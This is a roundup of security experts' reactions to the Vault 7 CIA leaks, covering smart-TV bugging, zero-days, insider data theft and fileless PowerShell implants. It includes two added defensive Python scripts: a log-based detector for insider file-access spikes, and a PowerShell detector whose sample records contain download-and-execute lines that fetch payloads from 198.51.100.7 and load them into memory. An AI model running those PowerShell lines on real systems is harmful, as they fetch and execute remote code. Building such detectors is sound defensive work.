According to the recent Wikileaks documents, British spy agencies worked with the CIA to turn televisions and smartphones into bugging devices that can record conversations and even take photographs. IT security experts from Tripwire, FireMon, Vectra Networks, Core Security, Pushfor, Cylance, Varonis, Synopsys, Comparitech.com, Sentinelone, Balabit and Avast commented below.
Craig Young, Security Researcher at Tripwire:
“If the reports are correct that intelligence agencies have developed the capability to deploy hacked firmware to a TV through a USB update process, it is also reasonable to believe that this technique could be extended to subvert the firmware update process over the Internet. Doing this however would require control over the network path between TVs and their update servers as well as having trusted security certificates. The security certificates would likely either need to be stolen from the vendor or fraudulently obtained from a trusted certification authority (CA).
End-users should recognize that there is always an inherent risk from connected devices having cameras or microphones as long as they are plugged in. Specifically, with Smart TVs, it is important to remember that pressing the power button is typically not going to perform a full power down as the device needs to receive signals from a remote control. This type of privacy issue is going to be increasingly important with the growing number of voice-first devices like Amazon Echo and Google Home. Consumers need to recognize that the only way to make certain that the device is not recording audio is to physically unplug them rather than simply pressing the mute button. Similar to how hackers have demonstrated the capability of activating web cams without turning on an indicator light, there is no guarantee that software on these devices is actually disabling the microphone.”
Paul Calatayud, CTO at FireMon:
“It’s somewhat common for zero day type exploits to be closely guarded by those who wrote them. Exploits hold value. As those exploits are used and thus discovered by defenders, they quickly lose value. Chances are, if these exploits are released, we will have a mix of ones that are now patched as well as others that are known and less valuable. The small amount that are still zero day will cause harm, but no more harm than the current level of thousands of exploits being written daily.”
Gunter Ollmann, CSO at Vectra Networks:
(1) The CIA’s “UMBRAGE” programme reveals the importance placed upon “false flag” signatures used in clandestine operations. It should be no surprise to the InfoSec community that such resources are expended to capture and duplicate the techniques used by foreign agencies and criminal organisations. It does however reinforce that the use of such techniques is in fact an everyday part of clandestine operational procedure – casting further doubt on public attribution disclosures – especially those quickly released and promoted by the marketing teams of commercial security vendors.
(2) As the tools and code are eventually released (by Wikileaks or accidentally) it is guaranteed that they will be used worldwide within 48 hours of disclosure. By the time a business has read of the tool release in the news, they will have less than 24 hours to respond to the released threat. Since there appears to be a substantial number of “zero day” exploits – each of which may take weeks for vendors to investigate and provide fixes for – it is critical that organisations take preemptive steps to “dial up to 11” their anomaly threat detection systems and have their threat hunting teams working diligently, pouncing on any new anomalies – with a perspective of zero-day exploits and false-flag malware attribution trails.
(3) The public disclosures of zero-days and attack tools for Samsung TVs and webcams will be very popular to all hackers – both criminal and hobbyists. Businesses that employ such technologies within their offices should preemptively be taking steps to selectively disable such video and sound capturing capabilities when not specifically needed for business operations. This may entail using electrical tape to cover TV video lens, physically disabling microphones when not in use, etc. Going into the device administration settings and disabling video and audio functions is highly unlikely to be effective – as any hacks against such devices can easily bypass or present false configuration settings to the admin and user interfaces on the device.
Willis McDonald, Senior Threat Manager at Core Security:
“The leaked CIA documents have potentially disastrous effects on ongoing CIA operations. If the tools detailed in the documents are still in use, this now gives clues to targeted organizations as to what is of interest to the CIA. As a consequence, this could also expose close contact human intelligence (HUMINT) operations, leading to incarceration and possible harm to operatives.
The leak of these documents definitely has caused financial harm to the CIA. Response to the leak of the documents will require a massive research and retooling effort in the CIA. Everything from tradecraft to tools will need to be changed in order for operations to continue undetected which will cost millions of dollars and months of training and development.”
John Safa, Security Expert and Founder at Pushfor:
“The real issue here isn’t that the CIA spies on people, or even how they do it. The issue is that source code for these hacking tools has been leaked and is available to anyone who wants to use it. Criminals and hackers have access to the hacking power of the CIA.
“It’s not enough to encrypt data in transit. Using the CIA methods, it can be stolen at the device level, before it gets encrypted. Thus making the new security improvements in WhatsApp easy to bypass.
“So many companies rely on free communications tools such as WhatsApp which use the public cloud. They are at risk and these free messaging apps should be banned for corporate use. They need to take back control of their own data environments and secure data in a walled garden where they have more control.
“It’s similar to the Sony DRM Rootkit scandal that happened 12 years ago. The unintended consequence of Sony putting copy protection software on its CDs was that it created a massive backdoor for hackers to access and plant malware on PCs. The same will happen now. Ostensibly, the CIA uses hacking tools to prevent terrorism and crime. But by leaking the source code for these tools, they’re opening the tools up to hackers and criminals.
“The ramifications of this are massive. It opens companies up to crime, data theft and corporate espionage.
“I find it fascinating that Deutsche Bank had banned corporate use of free messaging apps like WhatsApp just weeks ago. They’re looking pretty smart for doing that now.”
Jim Walter, Senior Researcher at Cylance:
“There are clear instances where the owner of this code is inspired by (and sometimes borrowing directly from) well-known malware. Familiar names like HiKit, Shamoon, and Nuclear EP appear multiple times, so it is interesting to see what threats the owner is taking cues from. Beyond that we have a great deal of analysis to do when it comes to putting this dataset into context with previous dumps pertaining to government techniques, tactics, and procedures.”
Brian Vecci, Technical Evangelist at Varonis:
“It’s too easy for data to be stolen, even—allegedly—within the CIA’s Center for Cyber Intelligence. The entire concept of a spook is to be covert and undetectable; apparently that also applies to actions on their own network. According to WikiLeaks, this treasure trove of files was given to them by a former U.S. government contractor. The CIA is not immune to issues affecting many organizations: too much access with too little oversight and detective controls. A recent Forrester study found that 59% of organizations do not restrict access to files on a need to know basis.
“In performing forensics on the actual breach, the important examination is to determine how 8,761 files just walked out of one of the most secretive and confidential organizations in the world. Files that were once useful in their operations are suddenly lethal to those same operations. We call this toxic data: anything that is useful and valuable to an organization but, once stolen and made public, turns toxic to its bottom line and reputation. All you have to do is look at Sony, Mossack Fonseca and the DNC to see the effects of this toxic data conversion.
“Organizations need to get a grip on where their information assets are, who is using them, and who is responsible for them. There are just too many unknowns right now. They need to put all that data lying around in the right place, restrict access to it and monitor and analyze who is using it.”
Lee Munson, Security Researcher at Comparitech.com:
“Wikileaks’ disclosure of what it claims are wide-ranging CIA hacking tools is hardly likely to surprise anyone in the post-Snowden world we now live in.
“Whether the alleged cyber weapons exist or not is largely immaterial at a time when I assume most people believe they do.
“What the Vault 7 leaks should do, however, is confirm that, while taking a nothing to hide, nothing to fear approach is hopelessly out of date, most citizens should not be any more concerned about surveillance today than they were yesterday.
“While exploits across a range of devices and the ability to turn on cameras and microphones is a touch chilling, they’re nothing new, and anyone with real concerns should already be going about their business with those possibilities in mind.
“The really interesting aspect to this leak, however, is how the alleged cyber spying tools all appear to have one thing in common – the need to acquire information over the wire.
“That means, for now at least, we can assume that messaging systems with strong end-to-end encryption are beyond the reaches of the security services; a win for everyone who is truly concerned about protecting their privacy today.”
Andy Norton, Risk Officer – EMEA at Sentinelone:
“What’s interesting here is the strategy in use. Clearly a lot of effort has gone into remaining unseen. It gives us great insight into how the most sophisticated cyber attackers operate, including do’s and don’ts guidelines for implanting systems, and the rationale behind choosing certain methods of attack, including the RickyBobby implant, which is PowerShell based, because RickyBobby uses Windows PowerShell to download and dynamically execute the .NET DLLs in memory.
OSB chose Windows PowerShell as the execution vector because it is installed by default on all of Microsoft’s operating systems since Windows Vista and it runs as a trusted, Microsoft-signed process. RickyBobby 4.x can be installed remotely or with physical access to the target computers using batch files. This underlines the trend towards “fileless” attacks as strategies developed at this level filter down to a broader threat.”
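The implant behaviour described above (PowerShell pulling a .NET assembly over the network and loading it straight into memory) leaves no file on disk, but it does leave a trace in PowerShell script block logging. The following is an added defender-side example, not code from the original article or from any of the quoted vendors: it scans script block log entries for the combination of a network download and a reflective assembly load, and expands `-EncodedCommand` arguments first so the indicators match the real script rather than the base64 blob. The log records, user names, URLs and weights are constructed for the example.

```python
"""Flag PowerShell script-block log entries that look like in-memory .NET loading."""
import base64
import re
from dataclasses import dataclass, field

# Indicator patterns (case-insensitive). Each hit adds its weight; a record is
# flagged when it reaches THRESHOLD, so a plain download does not fire on its
# own but a download combined with a reflective load or IEX does.
INDICATORS = {
    "download":        (r"downloaddata|downloadstring|invoke-webrequest|net\.webclient", 2),
    "reflective_load": (r"reflection\.assembly\]::load|\[assembly\]::load\(", 3),
    "invoke_expr":     (r"\biex\b|invoke-expression", 2),
    "hidden_window":   (r"-w(indowstyle)?\s+hidden|-nop\b|-noprofile", 1),
}
THRESHOLD = 4

# Matches -e / -enc / -EncodedCommand followed by a base64 argument.
ENC_RE = re.compile(r"-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]{16,})", re.I)


@dataclass
class Finding:
    record_id: int
    user: str
    score: int
    indicators: list = field(default_factory=list)


def decode_encoded_command(text):
    """Append the decoded (UTF-16LE) body of any -EncodedCommand argument so
    the indicator patterns can see the script that actually runs."""
    def _sub(m):
        try:
            return m.group(0) + " " + base64.b64decode(m.group(1)).decode("utf-16-le")
        except (ValueError, UnicodeDecodeError):
            return m.group(0)  # not valid base64/UTF-16: leave untouched
    return ENC_RE.sub(_sub, text)


def score_script(text):
    """Return (score, [indicator names]) for one script block."""
    expanded = decode_encoded_command(text)
    hits = [name for name, (pat, _) in INDICATORS.items() if re.search(pat, expanded, re.I)]
    return sum(INDICATORS[n][1] for n in hits), hits


def scan(records):
    """Records are dicts with id, user and script; returns the flagged ones."""
    findings = []
    for r in records:
        score, hits = score_script(r["script"])
        if score >= THRESHOLD:
            findings.append(Finding(r["id"], r["user"], score, hits))
    return findings


# Constructed sample records standing in for script block log entries.
_INNER = "IEX (New-Object Net.WebClient).DownloadString('https://198.51.100.7/a.ps1')"
_ENCODED = base64.b64encode(_INNER.encode("utf-16-le")).decode()
SAMPLE_RECORDS = [
    {"id": 1, "user": "alice", "script": "Get-ChildItem C:\\Logs | Where-Object { $_.Length -gt 1MB }"},
    {"id": 2, "user": "svc_build", "script": "$c = New-Object Net.WebClient; $c.DownloadFile('https://updates.example/x.zip', 'x.zip')"},
    {"id": 3, "user": "bob", "script": "$b = (New-Object Net.WebClient).DownloadData('https://198.51.100.7/stage.bin'); "
                                        "[System.Reflection.Assembly]::Load($b).EntryPoint.Invoke($null, $null)"},
    {"id": 4, "user": "carol", "script": "powershell.exe -nop -w hidden -enc " + _ENCODED},
]

if __name__ == "__main__":
    for f in scan(SAMPLE_RECORDS):
        print(f"record {f.record_id} user={f.user} score={f.score} indicators={f.indicators}")
```

Record 2 (a legitimate build script downloading a file to disk) scores below the threshold, while records 3 and 4 are flagged; the second of those is caught only because the encoded command is decoded before matching. Weights and patterns are a starting point to tune against your own baseline of administrative PowerShell use.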
Matthew Ravden, VP at Balabit:
“Assuming these revelations are true (and they certainly appear to be authentic), it’s probably fairly shocking to the general public to see the lengths to which a sophisticated government-sponsored organisation will go to find ways of ‘listening in’, through TVs, smart-phones or other ‘connected’ devices. For those of us in the security industry, however, none of this is particularly surprising. The resources available to the CIA, MI5, or the FSB are such that they can do pretty much anything. They live by a different set of rules from the rest of us.
Perhaps the greatest irony here, then, is that despite all their technological might, the CIA is unable to properly monitor its own staff. They can hack Samsung TVs but can’t spot an unusual server access or abnormal data dump. It’s well known that an organisation’s so-called ‘privileged users’ are its greatest vulnerability, and it only takes one individual with the requisite ‘clearance’ to cause this kind of mayhem. Clearly the lessons from the Snowden affair have not been heeded, and better monitoring and analytics technology is needed to stop these leaks from happening. For once, we in the commercial sector can feel slightly smug.”
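Both the Varonis comment (monitor and analyse who is using data) and the point above about failing to spot an abnormal data dump come down to the same control: comparing each user's file-access volume against their own history. The following added example is not code from the article or from either vendor; it takes file-server audit records as (timestamp, user, path) tuples, builds a per-user daily baseline from prior days only, and raises an alert when a day's count exceeds both a multiple of that baseline and an absolute floor. The users, paths, dates and the 800-file pull on the last day are constructed sample data.

```python
"""Flag users whose daily file-access volume spikes far above their own baseline."""
import statistics
from collections import defaultdict


def build_sample_log():
    """Constructed audit log: two analysts with steady daily reads for five days,
    then one of them pulling 800 files in the early hours of day six."""
    rows = []
    for day in range(1, 6):
        for user, n in (("analyst1", 20), ("analyst2", 15)):
            for i in range(n):
                rows.append((f"2017-03-0{day}T10:{i:02d}:00", user, f"\\\\fs01\\ops\\doc-{day}-{i}.docx"))
    for i in range(800):  # day 6, 02:xx: bulk read by analyst2
        rows.append((f"2017-03-06T02:{i % 60:02d}:{i // 60:02d}", "analyst2", f"\\\\fs01\\ops\\doc-{i}.docx"))
    for i in range(18):   # day 6: analyst1 behaves as usual
        rows.append((f"2017-03-06T10:{i:02d}:00", "analyst1", f"\\\\fs01\\ops\\doc-6-{i}.docx"))
    return rows


def daily_counts(rows):
    """user -> day (YYYY-MM-DD) -> number of accesses, plus off-hours accesses."""
    counts = defaultdict(lambda: defaultdict(int))
    off_hours = defaultdict(lambda: defaultdict(int))
    for ts, user, _path in rows:
        day, hour = ts[:10], int(ts[11:13])
        counts[user][day] += 1
        if hour < 7 or hour >= 20:
            off_hours[user][day] += 1
    return counts, off_hours


def find_spikes(rows, factor=5.0, floor=100):
    """Alert when a user's daily count is above factor * median(prior days)
    and above an absolute floor, so a user whose baseline is one file is not
    flagged for reading six. Days with no prior history are skipped."""
    counts, off_hours = daily_counts(rows)
    alerts = []
    for user, per_day in counts.items():
        for day, n in sorted(per_day.items()):
            prior = [c for d, c in per_day.items() if d < day]
            if not prior:
                continue
            baseline = statistics.median(prior)
            if n >= floor and n > factor * baseline:
                alerts.append({
                    "user": user, "day": day, "count": n,
                    "baseline": baseline, "off_hours": off_hours[user][day],
                })
    return alerts


if __name__ == "__main__":
    for a in find_spikes(build_sample_log()):
        print(f"{a['user']} on {a['day']}: {a['count']} reads "
              f"(baseline {a['baseline']}, {a['off_hours']} off-hours)")
```

Using only prior days for the baseline keeps the check usable as a streaming rule, and the off-hours count is carried in the alert as corroborating context rather than a trigger. In practice the same loop would read from the file server's audit trail and the factor and floor would be tuned per role.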
Sinan Eren, VP at Avast:
“What this news shows – and what security vendors and professionals need to scream out loud – is that today’s mobile platforms make it almost impossible to detect cybercriminals once they’ve broken in. Any embedded device will remain a great target because it presents a significant return on investment to hackers and nation-state actors. Even though compromising mobile systems and smart devices takes significant financial investment and manpower to do so, once cybercriminals are in, they’ll likely get several years’ use out of their malicious toolkits before they’re detected. We need open APIs and the ability to drive a paradigm shift where mobile platforms don’t shut out access to security vendors – if we can get access to their black box, we’ll be better able to detect when hackers are hiding in a mobile OS.”